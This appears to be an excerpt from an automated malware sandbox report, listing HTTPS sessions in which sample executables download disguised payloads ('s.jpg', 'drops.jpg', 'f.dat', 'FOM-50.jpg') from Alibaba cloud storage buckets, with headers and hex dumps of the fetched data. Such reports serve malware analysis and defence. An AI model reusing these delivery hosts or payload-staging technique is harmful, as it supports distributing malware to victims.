                                              Data Ascii: VH <dMs~/rSixpGTz& dnCz|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSxo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              6192.168.2.66277739.103.20.344432300C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:11:39 UTC111OUTGET /s.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: msd1sq.oss-cn-beijing.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:11:39 UTC543INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:11:39 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 8299
                                              Connection: close
                                              x-oss-request-id: 677A4CCBD4BE2031317E0BC7
                                              Accept-Ranges: bytes
                                              ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7"
                                              Last-Modified: Sat, 04 Jan 2025 09:22:47 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 692387538176721524
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000104
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: m9tqSvaBRwuFo9Rq9aTypw==
                                              x-oss-server-time: 6
                                              2025-01-05 09:11:39 UTC3553INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                              Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                              2025-01-05 09:11:39 UTC4096INData Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5
                                              Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy|9_;]:^8)'@/Ysq$hQ=2[C
                                              2025-01-05 09:11:39 UTC650INData Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90
                                              Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji|}~


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              7192.168.2.662780118.178.60.94436032C:\Users\user\Documents\EMp3o1.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:12:16 UTC114OUTGET /drops.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:16 UTC546INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:16 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 37274
                                              Connection: close
                                              x-oss-request-id: 677A4CF094C77F373199EDCA
                                              Accept-Ranges: bytes
                                              ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7"
                                              Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 9193697774326766004
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000105
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: bU3rlSbzlz3g+dzpOS+Opw==
                                              x-oss-server-time: 10
                                              2025-01-05 09:12:16 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31
                                              Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
                                              2025-01-05 09:12:16 UTC4096INData Raw: 83 b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11
                                              Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;|6@q_^/f
                                              2025-01-05 09:12:16 UTC4096INData Raw: eb d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c
                                              Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h|
                                              2025-01-05 09:12:16 UTC4096INData Raw: f9 72 b8 f8 65 fd f3 08 c8 16 67 54 0d cf 0b 6c 41 02 c8 a0 55 06 c4 14 75 72 5c ea 55 d3 97 57 dd f2 5b 5c 5d 16 d4 24 45 4a 6c da 65 e3 a7 67 ed f2 6b 6c 6d 26 e4 34 55 52 7c ca 75 f5 8f 39 05 67 33 f7 39 5a 5f 8f 3f 82 00 7c df f9 97 c0 02 ce af ac 82 30 8f 13 59 b2 1a 90 b1 7d 9c d0 12 de bf bc 92 20 9f 29 a5 86 eb 2f e1 82 8f a7 17 aa 28 54 ec d2 b1 f8 3a f6 97 9c ba 08 b7 3b 41 e0 c4 ad f5 35 fb e4 e9 cd 7d c4 46 0e e7 41 8d ee cf 27 c1 86 44 94 f5 fa dc 6a d5 5f 93 fc dd d5 6d d8 f9 d1 69 ac c5 e6 d8 25 90 f9 af 63 ad ce cb a4 12 2e a7 79 b5 d6 d3 bc 7e b2 d3 d0 b1 05 3b b4 74 ba db 28 e8 4a fc fb fa 4e 8c 4c 2d 2a 04 b2 0d 8d f7 51 6d 0c 5b 9f 51 32 37 17 a7 1a 98 e4 47 61 0e 68 aa 66 07 04 2a 98 27 ab e1 0a a2 68 09 26 c4 3c 79 b9 77 10 15 39 89
                                              Data Ascii: regTlAUur\UW[\]$EJlegklm&4UR|u9g39Z_?|0Y} )/(T:;A5}FA'Dj_mi%c.y~;t(JNL-*Qm[Q27Gahf*'h&<yw9
                                              2025-01-05 09:12:17 UTC4096INData Raw: 1d 8a 3b 3c 3d ae 77 c1 85 4a 42 44 45 85 8b 84 85 86 87 80 81 82 83 18 d0 be db 56 55 56 91 1c 7d 2a 68 9a 19 7a 2e 56 a7 26 47 16 55 a0 23 4c 1a 1e ad 28 49 1a 1d b6 35 56 06 15 b3 32 53 0e 00 bc 3f 58 0a 50 b9 c4 a5 fa e6 42 c1 a2 fe f0 4f ce af f6 e8 48 cb b4 ea 92 55 d0 b1 d6 a4 5e dd be da aa 5b da bb e2 91 64 e7 80 e6 d5 61 ec 8d ee cf 6a e9 8a ea 9e 77 f6 97 f2 d0 70 f3 9c fe c2 7d f8 99 f6 da 06 85 e6 8a c4 03 42 e3 48 c9 ca cb ff 0b 4a eb 51 d1 d2 d3 e2 13 52 f3 5a d9 da db ec 1b 5a fb 63 e1 e2 e3 97 23 62 c3 6c e9 ea eb 8d 2b 6a cb 75 f1 f2 f3 92 33 72 d3 7e f9 fa fb 99 3b 7a db 87 01 02 03 2a c3 82 23 80 09 0a 0b 69 cb 8a 2b 99 11 12 13 6c d3 92 33 92 19 1a 1b 79 db 9a 3b ab 21 22 23 24 e3 62 03 08 42 ec 6f 08 0c 4b e9 74 15 10 41 f2 71 12 14
                                              Data Ascii: ;<=wJBDEVUV}*hz.V&GU#L(I5V2S?XPBOHU^[dajwp}BHJQRZZc#bl+ju3r~;z*#i+l3y;!"#$bBoKtAq
                                              2025-01-05 09:12:17 UTC4096INData Raw: b2 3e 1f 74 b6 72 1b 60 09 41 8b 0c ce 87 0f c3 45 6e 03 c7 19 6a 67 18 52 83 1b df 9f 59 e1 51 d1 52 b0 f0 15 d5 5b 44 29 e9 2f 40 45 2e 64 a0 21 e1 aa aa 6d 6e 27 fb 35 56 53 3c f6 b2 6f bb b5 b6 b7 b0 b1 b2 b3 c8 08 d6 a7 94 cd 0f cb ac 81 c2 08 60 95 c6 04 d4 b5 b2 db 1d 91 b2 df 13 dd be b3 d4 14 da bb a8 e9 29 a7 80 aa 18 a7 2d 69 de a6 e4 26 aa 8b f8 4e 72 fb 3d b1 92 5c 50 f1 31 bf 98 f5 35 f3 e4 c9 cd 75 cd 4d ce 8f 43 cd ee 83 33 0d 86 46 d4 f5 9a 58 90 f1 de 9f 27 19 92 52 98 f9 d6 97 6b a5 c6 eb eb 5b e6 62 28 9c 24 a3 67 e9 ca 29 f0 f1 ba 78 b0 d1 d6 bf 7b 3d e2 38 30 31 32 33 44 88 46 27 1c 4d 8f 53 2c 19 42 82 40 29 06 47 93 fd 3a 5b 9f 51 32 2f 50 90 5e 3f 0c 55 95 5b 04 11 6a aa 60 01 2e ac 6c 0d 6a a2 28 09 a5 6b 14 71 cd fb bd 71 12 77
                                              Data Ascii: >tr`AEnjgRYQR[D)/@E.d!mn'5VS<o`)-i&Nr=\P15uMC3FX'Rk[b($g)x{=80123DF'MS,B@)G:[Q2/P^?U[j`.lj(kqqw
                                              2025-01-05 09:12:17 UTC4096INData Raw: 7d 1e 63 74 b0 aa 1b c8 41 42 43 0c c8 4b e2 8d b6 b5 a3 1c 82 b1 b0 18 d8 16 77 34 1d 91 13 7c 69 5a 5b 5c 5d 99 1b 44 49 e2 63 64 65 a1 23 4c 49 68 6b 6c 6d 2b 5c b9 34 41 b3 ce 75 76 77 38 31 f1 f7 58 cd 7e 7f 80 7e d6 a7 d4 cd 0f c3 ac c1 c2 08 f0 a9 c6 70 e4 a0 da 54 d0 b1 b6 97 98 99 9a d7 11 d1 ba df e4 2a 26 87 64 a5 a6 a7 e0 22 3e 8f 14 ad ae af f8 3a fe 97 fc 4a e2 93 e0 f1 31 f7 98 f5 41 eb e4 a1 52 8b 45 01 6e c7 c8 c9 09 07 00 01 02 03 98 58 9e f7 dc 9d 55 3b f0 91 51 9f f8 ed 96 56 a4 c5 f2 ab 23 e1 c2 18 17 16 15 a3 13 e9 ca a7 7b b5 d6 e3 bc 7e fa d3 78 c5 f2 fb 89 10 b6 74 04 25 4a 8a 40 21 0e 4f 8b 75 2e 03 0c 78 0c e4 3d 59 99 57 30 1d 5e 9c 54 3d 2a 53 1f d5 56 94 e1 2e 9c 63 db a6 de 7b 5d 3d 62 a0 68 09 26 67 bb 7d 16 03 7c 36 fe 7f
                                              Data Ascii: }ctABCKw4|iZ[\]DIcde#LIhklm+\4Auvw81X~~pT*&d">:J1AREnXU;QV#{~xt%J@!Ou.x=YW0^T=*SV.c{]=bh&g}|6
                                              2025-01-05 09:12:17 UTC4096INData Raw: 7d 1e 03 74 be fe 27 01 f9 46 43 44 45 0e cc 98 01 c7 c7 68 a5 4e 4f 50 b9 f8 b3 ab aa 1e dc 1c 7d 62 13 df 9d 42 1e d8 69 62 63 64 2d ed b7 20 e2 e6 4f 7c 6c 6e 6f 98 fa 92 8c 8b 3d fd f3 5c 19 7b 7b 7c 35 f5 f3 a4 c9 83 83 84 cd 0f 8f c0 02 0e af ec 8c 8e 8f 1b 1d b6 77 94 95 96 1e d0 91 d2 10 18 b9 fe 9e a0 a1 ea 28 28 81 a6 a6 a8 a9 e2 22 e4 bd e6 24 34 95 d2 b2 b4 b5 3d 3b 9c 51 ba bb bc 34 f6 a7 88 4a 46 e7 a4 c4 c6 c7 80 42 46 ef dc cc ce cf 98 58 9a f3 9c 5e 52 f3 b8 d8 da db 94 5c 1a 87 e1 e1 e2 20 28 29 2a 2b 24 25 26 27 20 21 22 23 b8 78 be d7 fc bd 7d b3 dc f1 b2 70 fc b5 3f 1f 15 49 89 4f 20 0d 4e 8c 01 41 39 c3 44 86 cf 47 9b 5d 36 1b 5c 9c 17 5f 93 5d 3e 13 54 96 1e 57 e1 c9 01 6b af 69 02 2f 60 a2 23 63 1f e5 66 a4 f1 79 b9 7f 10 3d 7e be
                                              Data Ascii: }t'FCDEhNOP}bBibcd- O|lno=\{{|5w(("$4=;Q4JFBFX^R\ ()*+$%&' !"#x}p?IO NA9DG]6\_]>TWki/`#cfy=~
                                              2025-01-05 09:12:17 UTC4096INData Raw: 39 3a 5e fa b9 1a 89 40 41 42 20 82 c1 62 f0 48 49 4a 3f 8a c9 6a f7 50 51 52 3c 92 d1 72 ee 58 59 5a 29 9a d9 7a e5 60 61 62 1a a2 e1 42 dc 68 69 6a 2a aa e9 4a d3 70 71 72 73 3c f8 e2 53 d0 79 7a 7b 34 f0 73 12 25 7e 7d 6b 9c 2a 79 78 c0 00 0e af a4 8f 8e 8f d8 1c 1e b7 c4 a7 96 97 67 0d be b3 9e 9d 9e d7 2d 2d 86 ff 91 a5 a6 4f 1c a4 aa ab e4 20 22 8b d0 87 b2 b3 5c 12 bb b7 b8 f1 37 37 98 d9 89 bf c0 29 58 ce c4 c5 8e 4a 44 ed a2 f3 cc cd 26 42 dd d1 d2 9b 59 59 f2 8b ed d9 da 33 2c d4 de df 26 65 c6 63 e4 e5 e6 a0 2e 6d ce 6a ec ed ee 8a 36 75 d6 71 f4 f5 f6 83 3e 7d de 78 fc fd fe af c6 85 26 87 04 05 06 75 ce 8d 2e 8e 0c 0d 0e 60 d6 95 36 95 14 15 16 74 de 9d 3e 9c 1c 1d 1e 7a e6 a5 06 ab 24 25 26 54 ee ad 0e a2 2c 2d 2e 5c f6 b5 16 b9 34 35 36 7f
                                              Data Ascii: 9:^@AB bHIJ?jPQR<rXYZ)z`abBhij*Jpqrs<Syz{4s%~}k*yxg--O "\77)XJD&BYY3,&ec.mj6uq>}x&u.`6t>z$%&T,-.\456
                                              2025-01-05 09:12:17 UTC956INData Raw: b0 66 1f 34 70 0d e4 0c cc 16 67 5c 09 6d 97 05 46 08 98 29 01 c5 53 75 41 52 53 54 18 6d 84 2b 4f 3c 1a dd bf 5e af 2d ec f9 63 94 9a 99 26 ae 6a 6a 26 57 be 1b 9f 3c fa 66 57 38 fe 2a 53 70 31 f9 bf 6c be b2 b3 81 86 80 83 83 84 af 87 89 80 8b 8b 85 af 8e 8f 91 9c 93 93 99 d7 96 97 99 94 9b 9b 91 5f 9e 9f a1 ab a1 a3 ae 67 a0 d7 ad c9 aa ab ad a3 af af be 13 b2 b3 b5 bb b7 b7 b6 9b ba bb bd b1 bc bf cc c0 ff c3 c5 c2 c4 c7 cf c8 dd cb cd c4 cf cf d9 13 d2 d3 d5 d1 d7 d7 dc 3b da db dd d9 df df e4 23 e2 e3 e5 ee e4 e7 e3 e8 cb eb ed ea ec ef f7 f0 a3 f3 f5 e4 f4 f7 e9 f8 df fb fd f0 ff ff 0d 63 02 03 05 02 04 07 0f 08 21 0b 0d 09 0f 0f 14 b3 12 13 15 06 17 17 0b 3b 1a 1b 1d 0e 1f 1f 33 63 22 23 25 2b 27 27 26 6b 2a 2b 2d 23 2f 2f 3e 53 32 33 35 2d 37 37
                                              Data Ascii: f4pg\mF)SuARSTm+O<^-c&jj&W<fW8*Sp1l_g;#c!;3c"#%+''&k*+-#//>S235-77


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              8192.168.2.662781118.178.60.94436032C:\Users\user\Documents\EMp3o1.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:12:19 UTC110OUTGET /f.dat HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:20 UTC558INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:19 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 879
                                              Connection: close
                                              x-oss-request-id: 677A4CF33849223538084E39
                                              Accept-Ranges: bytes
                                              ETag: "E54C4296F011EC91D935AA353C936E34"
                                              Last-Modified: Tue, 22 Oct 2024 18:02:54 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 11142793972884948456
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000113
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: 5UxClvAR7JHZNao1PJNuNA==
                                              x-oss-server-time: 6
                                              2025-01-05 09:12:20 UTC879INData Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31
                                              Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              9192.168.2.662782118.178.60.94436032C:\Users\user\Documents\EMp3o1.exe
                                              TimestampBytes transferredDirectionData
                                              2025-01-05 09:12:21 UTC115OUTGET /FOM-50.jpg HTTP/1.1
                                              User-Agent: GetData
                                              Host: 22mm.oss-cn-hangzhou.aliyuncs.com
                                              Cache-Control: no-cache
                                              2025-01-05 09:12:21 UTC546INHTTP/1.1 200 OK
                                              Server: AliyunOSS
                                              Date: Sun, 05 Jan 2025 09:12:21 GMT
                                              Content-Type: image/jpeg
                                              Content-Length: 55085
                                              Connection: close
                                              x-oss-request-id: 677A4CF5F947FB3032E3B694
                                              Accept-Ranges: bytes
                                              ETag: "DC44AE348E6A74B3A74871020FDFAC74"
                                              Last-Modified: Tue, 22 Oct 2024 14:47:46 GMT
                                              x-oss-object-type: Normal
                                              x-oss-hash-crc64ecma: 12339968747348072397
                                              x-oss-storage-class: Standard
                                              x-oss-ec: 0048-00000105
                                              Content-Disposition: attachment
                                              x-oss-force-download: true
                                              Content-MD5: 3ESuNI5qdLOnSHECD9+sdA==
                                              x-oss-server-time: 4
                                              2025-01-05 09:12:21 UTC3550INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08
                                              Data Ascii: JFIFZExifMM*JQQ%Q%CC
                                              2025-01-05 09:12:21 UTC4096INData Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96
                                              Data Ascii: |{Atwutse>4HYAVVSRt2Q|(M8B&0:**)TW"TDn*2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
                                              2025-01-05 09:12:21 UTC4096INData Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81
                                              Data Ascii: FG*2<L\"h((JIr0SCF4=8;987@3A>s](Sn*&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
